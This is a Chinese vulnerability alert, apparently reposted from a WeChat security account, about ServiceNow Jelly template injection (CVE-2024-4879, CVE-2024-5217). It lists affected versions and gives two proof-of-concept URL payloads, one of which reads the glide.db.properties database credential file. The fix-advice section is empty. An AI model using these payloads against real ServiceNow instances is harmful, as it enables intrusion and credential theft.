-
CVE-2024-4879
-
CVE-2024-5217
-
高危
ServiceNow是一个业务转型平台。通过平台上的各个模块,ServiceNow可用于从人力资源和员工管理到自动化工作流程或作为知识库等各种用途。
- ServiceNow < Utah Patch 10 Hot Fix 3
- ServiceNow < Vancouver Patch 6 Hot Fix 2
- ServiceNow < Vancouver Patch 7 Hot Fix 3b
- ServiceNow < Vancouver Patch 8 Hot Fix 4
- ServiceNow < Vancouver Patch 9
- ServiceNow < Vancouver Patch 10
- ServiceNow < Washington DC Patch 1 Hot Fix 2b
- ServiceNow < Washington DC Patch 2 Hot Fix 2
- ServiceNow < Washington DC Patch 3 Hot Fix 1
- ServiceNow < Washington DC Patch 4
0x05 POC
# CVE-2024-4879
{{BaseURL}}/login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style>
# CVE-2024-5217
{{BaseURL}}/login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
0x06 修复建议
原文始发于微信公众号(浅安安全):漏洞预警 | ServiceNow Jelly模板注入和远程代码执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论